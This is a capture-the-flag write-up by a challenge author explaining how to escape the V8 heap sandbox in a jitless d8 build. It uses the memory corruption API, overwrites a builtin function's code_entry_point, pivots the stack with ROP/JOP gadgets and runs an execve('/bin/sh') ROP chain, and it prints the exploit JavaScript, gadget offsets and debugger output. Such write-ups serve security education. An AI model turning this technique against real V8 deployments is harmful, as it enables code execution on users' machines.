KITCTFCTF 2022 V8 Heap Sandbox Escape

Two weeks ago we organized our first ever CTF KITCTFCTF 2022. Even though it was a challenging and stressful task, I certainly had a blast preparing challenges and watching the playing teams progress.
One of my challenges called Date was a V8 exploitation challenge that unfortunately stayed unsolved during the CTF.
In this writeup, I’ll go over the intended solution in detail which leads to a V8 (heap) sandbox escape without using the JIT technique that is very popular currently.

The Challenge⌗

We are given an archive with a few files. Notably, a d8 binary, a build.Dockerfile and a server.py next to the setup for hosting the challenge on the remote server.
d8 is the V8 developer shell and can be used to experiment with the execution of javascript in V8.
The server.py script is running on the remote server and is executing the d8 binary with the arguments --jitless, --no-expose-wasm and a file with contents we can control. Essentially, the server lets us execute arbitrary javascript in V8 while JIT compilation is disabled and WASM cannot be used from our code.
So where is the catch? Surely, we don’t have to burn our precious V8 0-days for a CTF with a zero rating on CTFTime, right?

After taking a closer look at the build.Dockerfile below, we can see that V8 is built from commit 29131d5e3ea9cbfeae3e6dc3fd6c4439f0ac4bde and with the flags v8_enable_sandbox and v8_expose_memory_corruption_api set to true. Those flags enable the V8 sandbox and the memory corruption API respectively. The following two sections will touch on both of these features.

FROM ubuntu:22.04 as build

...

RUN cd /build && fetch v8 && cd v8 && \
    git checkout 29131d5e3ea9cbfeae3e6dc3fd6c4439f0ac4bde && \
    git apply ../remove_globals.patch && gclient sync

# build with enabled memory_corruption_api
RUN cd /build/v8 && gn gen out/release \
    --args='is_debug=false target_cpu="x64" v8_enable_sandbox=true v8_expose_memory_corruption_api=true' && \
    autoninja -C out/release d8

V8’s (Heap) Sandbox⌗

The idea of the V8 sandbox was originally introduced in July 2021. Recently, this sandbox was enabled by default in V8 builds with commit a8c27fc.
I won’t go into detail here, so I highly recommend reading the High-Level Design Doc and the External Pointer Sandboxing Doc that describe the objectives and the internals of this new sandbox.
Essentially, the V8 sandbox is supposed to become a robust security boundary in the future by forcing attackers, that already can corrupt arbitrary memory on the V8 heap, to come up with an additional heap sandbox escape for a full renderer compromise. Achieving this is done by replacing all raw pointers on the V8 heap either with offsets relative to the heap base or with an index into an external pointer table that is located outside this sandboxed heap region.
However, due to the sandbox being in a very early stage, there are still some raw pointers left which we can play around with!

Escaping the Sandbox with JIT⌗

There are some nice resources covering this technique already (e.g. Code Execution in Chromium’s V8 Heap Sandbox by Anvbis) so I won’t go into detail here. However, for the sake of completeness, a short summary is given in the following section.
In essence, function objects in V8 contain a code field which, in turn, contain a code_entry_point field. In this field, a full raw (unsandboxed) pointer to the actual machine code is stored that will be jumped when the corresponding function is called. For a function that was JIT compiled, this field would point to an executable page containing the compiled machine code of this function.
The function object and the corresponding code object are stored on the V8 heap and can therefore be overwritten by an attacker with arbitrary read/write capabilities inside the heap sandbox. As this code_entry_point field is not validated in any way, overwriting it leads to direct control of the instruction pointer when the function is called.
How do we get RCE from here though? This is where the JIT compiler comes into play. We can encode small shellcode parts in floating point numbers because of the way those are translated to machine code and shift the code_entry_point a little bit. This way, when the compiled function is executed, our shellcode is executed instead of the code that was originally compiled.
As I have skipped over some important parts here, I highly recommend reading the mentioned blogpost which explains this more thoroughly.

V8’s Memory Corruption API⌗

To ease testing of the sandbox and its ability to limit attackers in corrupting memory outside the V8 heap, a memory corruption API was introduced.
This API can be enabled with the v8_expose_memory_corruption_api flag and allows us, as the name suggests, to corrupt arbitrary memory inside the V8 heap. In addition, an addrOf primitive is exposed, effectively allowing us to get the (relative) address of arbitrary javascript objects.
All of this is encapsulated in a new Sandbox object that is accessible from within javascript.
The code below shows how Sandbox.MemoryView can be used in combination with a DataView to achieve an arbitrary read/write inside the sandbox. Moreover, I defined different readHeap/writeHeap functions for convenience that make use of this DataView to read from or write to the V8 heap at the given relative addresses. Whenever I am mentioning this “arbitrary” read/write from now on, I am referring to an arbitrary read/write inside the sandbox! A classic arbitrary read/write that would allow us to read/write anywhere, especially outside the sandbox, would already denote a sandbox escape.

var sbxMemView = new Sandbox.MemoryView(0, 0xfffffff8);
var dv = new DataView(sbxMemView);
var addrOf = (o) => Sandbox.getAddressOf(o);

var readHeap4 = (offset) => dv.getUint32(offset, true);   
var readHeap8 = (offset) => dv.getBigUint64(offset, true);   
var writeHeap1 = (offset, value) => dv.setUint8(offset, value, true);
var writeHeap4 = (offset, value) => dv.setUint32(offset, value, true);   
var writeHeap8 = (offset, value) => dv.setBigUint64(offset, value, true);

We can easily verify the given addrOf primitive by defining an object and comparing the results of the returned address with the output of %DebugPrint (d8 has to be started with the --allow-natives-syntax parameter to expose %DebugPrint).

d8> var o = {a: 1337, b: 4242};
d8> addrOf(o).toString(16);
"10ca10"
d8> %DebugPrint(o);
DebugPrint: 0x13a20010ca11: [JS_OBJECT_TYPE]
 - map: 0x13a20025badd <Map[20](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x13a200244899 <Object map = 0x13a200243f55>
 - elements: 0x13a200002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x13a200002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    0x13a20000407d: [String] in ReadOnlySpace: #a: 1337 (const data field 0), location: in-object
    0x13a20000408d: [String] in ReadOnlySpace: #b: 4242 (const data field 1), location: in-object
 }

As we can see, the address returned by addrOf matches the lower 32-bit obtained by %DebugPrint perfectly with the exception of the least significant bit. This deviation is caused by V8 using pointer tagging to internally differentiate between pointers and small integers. While the addrOf returns the untagged (relative) pointer, the %DebugPrint shows the tagged pointer as it would be stored in memory. If you want to know more about pointer tagging, small integers and V8 internals in general you should check out Jack Halon’s Chrome Browser Exploitation series which explains all of this in great detail.
It is also worth noting that the addrOf primitive does not return the full raw pointer to the object but only the offset relative to the V8 heap base.
Verifying the arbitrary read/write can be done by overwriting the length of an array as an example.

d8> var a = [0, 1, 2, 3, 4];
d8> var addrOfLength = addrOf(a) + 0xc;
d8> readHeap4(addrOfLength) >> 1;
5
d8> writeHeap4(addrOfLength, 1337 << 1);
d8> a.length;
1337

First of all, we define an array with a length of five. V8 stores this length at offset 0xc in memory (atleast for the commit which we are working with). With the addrOf primitive, we are then able to compute a relative pointer to this length in memory. Using the defined readHeap4 and writeHeap4 functions, we can verify that we can actually read and write to the array length.
The shifting of the length stems from the fact that this length is stored as a small integer in V8 internally (refer to the mentioned blogpost for the details on this!).

In summary, the memory corruption API provides a method to obtain the relative address of any javascript object, in addition to the ability to read and write arbitrary memory inside the V8 heap.
Returning to the challenge, the goal should be quite now clear. We have to escape the V8 sandbox by utilizing the memory corruption API and without using JIT or WASM. Our 0-days seem to be safe for now after all.

Escaping the sandbox (again)⌗

Unfortunately, as the JIT compiler is disabled, we cannot use the mentioned technique with the compiled floats that contain shellcode to get RCE. Using a function object and overwriting its code_entry_point to get control over the instruction pointer still works though!
While inspecting the V8 heap and searching for off-heap pointers, I realized that the code_entry_point of builtin functions like Math.min or console.log points to the executable region of the d8 binary (or to libv8.so for debug builds).
We can verify this in gdb with the Math.min function as an example by following the code (offset 0x18) and code_entry_point (offset 0xc) pointers:

d8> %DebugPrint(Math.min);
DebugPrint: 0x304d00187661: [Function] in OldSpace
   ...
 - builtin: MathMin
 - code: 0x304d0014efad <CodeDataContainer BUILTIN MathMin>
   ...

d8> %DebugPrintPtr(0x304d0014efad) // Math.min->code
DebugPrint: 0x304d0014efad: [CodeDataContainer] in OldSpace
   ...
 - kind: BUILTIN
 - builtin: MathMin
 - code_entry_point: 0x55555667ba00
   ...

pwndbg> x/gx 0x304d0014efac+0xc  
    0x304d0014efb8: 0x55555667ba00

pwndbg> vmmap 0x55555667ba00
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x55555591c000     0x5555568fa000 r-xp   fde000 3c7000 /date/d8 +0xd5fa00

pwndbg> x/3i 0x55555667ba00
   0x55555667ba00 <Builtins_MathMin>:   push   rbp
   0x55555667ba01 <Builtins_MathMin+1>: mov    rbp,rsp
   0x55555667ba04 <Builtins_MathMin+4>: push   rsi

So, what have we got so far? RIP control and a large portion of executable memory that we can also get pointers to!
The first thing that comes to mind is trying to do ROP with this for RCE. Before we continue on this path though, we should verify that everything works properly from within javascript as well.

// resolve address of the Math.min JS_FUNCTION object on the V8 heap
var mathMinPtr = addrOf(Math.min);

// resolve Math.min->code at offset 0x18
var mathMinCodePtr = readHeap4(mathMinPtr + 0x18) - 1;

// read the pointer to the Builtins_MathMin function
var mathMinBuiltinFuncPtr = readHeap8(mathMinCodePtr + 0xc);

Making use of readHeap functions in addition to the addrOf primitive, we can first resolve the address of the Math.min JS_FUNCTION object on the V8 heap and follow the code and code_entry_point pointers to finally read the full raw 64-bit pointer to the Builtins_MathMin function. Printing the resulting values in hex shows that we indeed end up with the correct raw pointer!

Math.min @ 0x186598
Math.min->code @ 0x14de0c
Builtins_MathMin @ 0x55555667ba00

Now we can just subtract the constant offset for Builtins_MathMin and we have the base address of the d8 executable region.

var v8RXPageBase = mathMinBuiltinFuncPtr - 0xd5fa00n;

function rebase(x) {
    return v8RXPageBase + x;
}

I also defined a convenience function for rebasing offsets which comes in handy later.
Verifying that we can get control of the instruction pointer is similarly straingtforward. Using the writeHeap function, we can just overwrite the code_entry_point of the Math.min function and call it afterwards.

writeHeap8(mathMinCodePtr + 0xc, 0x4141414142424242n);
Math.min();

Executing this with gdb attached confirms that we overwrote the code_entry_point successfully which leads to RIP control as we imagined. Nonetheless, there are still some obstacles to overcome as we can only execute one gadget for now where the final goal would be to execute multiple gadgets resulting in an execve ROP chain. With V8 not being your typical CTF codebase, even if we could return cleanly and without crashing after executing one gadget, it is probably pretty difficult to do something persistent with just one ROP gadget alone. That said, instead of limiting ourselves to ROP exclusively, we can try to use JOP as well. We control a lot of memory where we can place additional gadgets so using JOP makes sense here.
In the end, using one ROP and one JOP gadget to pivot the stack to the actual execve ROP chain worked out very reliably. The execve ROP chain will be written to the pivot location before the pivot happens of course. Concretely, I used the following two gadgets for the initial stack pivot:

0x0000000000c87bba: pop rsp; add rsp, 0x10; pop rbp; ret; 
0x0000000000cd6fb8: pop rdx; jmp qword ptr [rsi + 0x41];

To understand how the pivot works, let’s look at the state of the execution when the overwritten code_entry_point will get jumped.

The first gadget performs the actual pivot and after execution rsp will be set to (*old_rsp) + 0x18. If we take a look at the stack after we get RIP control we can see that its top element points to an executable page which will neither be writable nor reside inside the V8 heap. Because we cannot write anything there, it is not a suitable pivot location. Instead, this is where the JOP gadget becomes relevant. There are a lot of pointers to the V8 heap (with 0x36ff00000000 being their base address for this execution) starting from rsp+8 on the stack and in some registers including rsi. If we could therefore increase the stack pointer first, for example by eight, and then execute the pop rsp gadget, we would have successfully pivoted the stack to a location inside the sandbox which we control. This is exactly what the mentioned JOP gadget is doing with the pop rdx.
To combine the two gadgets the code_entry_point of Math.min will be set to the address of the pop rdx; jmp qword ptr [rsi + 0x41]; gadget and the pop rsp gadget will be written to rsi + 0x41. When Math.min is executed in the end, rsp is increased by eight and the pivot is performed.
This would have resulted in a pivot to 0x36ff0018629d + 0x18 for this run. Now we just have to figure out where rsi and the value on the stack point to so that we can overwrite those with the gadget and the full execve ROP chain respectively.
With a bit of trial and error and a few uses of %DebugPrintPtr, we can figure out that rsi points to this + 0x38, with this being the globalThis javascript property. Additionally, the value on the stack points to the Math javascript object. Both of these objects live on the V8 heap so we can get pointers to them with the addrOf primitive and freely overwrite them as well (although we might crash somewhere if we are not careful).
After calculating the full raw pointers for the two gadgets that we need, we make use of the writeHeap8 function once more to write a sample ROP chain to the address of the pivoted stack and setup the two gadgets properly before calling Math.min.

// pop rdx; jmp qword ptr [rsi + 0x41]; 
var cleanUpStackRetAddrGadget = rebase(0xcd6fb8n);

// pop rsp; add rsp, 0x10; pop rbp; ret; 
var stackPivotGadget = rebase(0xc87bban);

var globalThisObjPtr = addrOf(this);
var pivotedStackAddress = addrOf(Math) + 0x18 + 1;

writeHeap8(mathMinCodeEntryPointPtr, cleanUpStackRetAddrGadget);

writeHeap8(globalThisObjPtr + 0x38 + 1 + 0x41, stackPivotGadget);

var chain = [0x4343434343434343n, 0x4444444444444444n, 0x4545454545454545n];
for (var i = 0; i < chain.length; i++) {
    writeHeap8(pivotedStackAddress + i * 8, chain[i]);
}

Math.min();

As we can see in the gdb screenshot below, the pivot works out the way we expected.

With the ability to execute an arbitrary ROP chain getting RCE is simple. Ultimately, we are pretty much done now and even though this solution is rather straightforward, it took me quite some time to come up with something that worked well enough.
However, I should note a few things here that I struggled with during exploitation. You have to be pretty careful what you overwrite on the V8 heap as this often leads to crashes or weird behavior before you can take RIP control. Especially overwriting the first four bytes of an object, where a pointer to the map of the object is stored, will most likely crash somewhere on object access if the new pointer does not point to memory that at least somewhat resembles a valid map. Hence, the add rsp, 0x10; pop rbp; part of the stack pivot gadget ensures that we do not have to touch the first few bytes of the object and can start overwriting from offset 0x18.

In addition, I originally exploited this without --jitless and --no-expose-wasm even though I always intended to disable JIT. While executing d8 without --jitless and --no-expose-wasm, the code_entry_point of the builtins did not point to the executable region of the d8 binary but instead pointed to a separate executable region. This region contained fewer gadgets and its base address did not seem to be correlated with the one of the original executable region of d8. With fewer gadgets to work with, I ended up using the two gadgets I explained above. Without this restriction, there might be easier ways to get RCE.
When using --jitless and --no-expose-wasm, this did not happen though. After the CTF was over and I discussed the intended solution in the discord, I mentioned this as well. Although I verified the mentioned behavior on Ubuntu and Arch, this did not seem to be the case for everybody and therefore might still suggest an OS related issue. Since I still have not figured out what causes this, if anybody can reproduce this behavior and has an explanation, I would appreciate a quick DM on Twitter or Mastodon :D

Going back to the challenge, we can finish up by using a standard ROP chain that will result in the execution of execve("/bin/sh", 0, 0). Instead of just encoding the “/bin/sh” string in the ROP chain I decided to write the command that is supposed to be executed to the V8 heap. It should be noted here that even though this approach might be a bit more flexible, encoding the command in the ROP chain is perfectly fine as well. At last, I used the following ROP chain to get RCE.

xor esi, esi; ret;
xor edx, edx; ret; 
pop rdi; ret; 
<cmdBufferPtr> // full raw pointer to the command string on the V8 heap
pop rax; ret;
0x3b
syscall // execve(cmd, 0, 0)

This pointer to the command obviously needs to be a full raw 64-bit pointer so we also have to somehow get the base address of the V8 heap and add the offset of the command buffer to it. Luckily, this base address is present on the V8 heap and can be read from the relative address 0x1c. Consequently, if you need to turn offsets relative to the V8 heap base to full raw pointers you can just read the base address from there (assuming you have an arbitrary read inside the V8 heap of course). The code below shows how this part is implemented in javascript.

// read the upper 32-bits of the V8 heap base
var v8HeapBase = BigInt(readHeap4(0x1c)) << 32n;

const cmd = "/bin/sh";
var cmdBufferPtr = v8HeapBase + 0x180200n;

// write the command to the given offset on the V8 heap
for (var i = 0; i < cmd.length; i++) {
    writeHeap1(0x180200 + i, cmd.charCodeAt(i));
}
writeHeap1(0x180200 + cmd.length, 0);

The relative offset where the command is written to (0x180200) was pretty arbitrarily chosen. I just looked for regions on the V8 heap that did not contain other data and where the risk of corrupting anything important was low.

To conclude, using the mentioned ROP chain that can also be seen in the code below resulted in the execution of the specified command and therefore in a shell being spawned.

var ropchainExecve = [
    rebase(0x289e0n),
    rebase(0x873541n),
    rebase(0xeacd9n),
    cmdBufferPtr,
    rebase(0x83b67n),
    0x3bn,
    rebase(0xff0bfn)
];


for (var i = 0; i < ropchainExecve.length; i++) {
    writeHeap8(pivotedStackAddress + i * 8, ropchainExecve[i]);
}

Math.min();

Using the full exploit on the original remote server will finally allow us to get the flag. The full exploit can be found here.

I intend to keep this challenge as well as my other challenges available on the remote for the foreseeable future. So if you want to get your hands dirty and exploit it yourself, you can still do so: nc kitctf.me 6969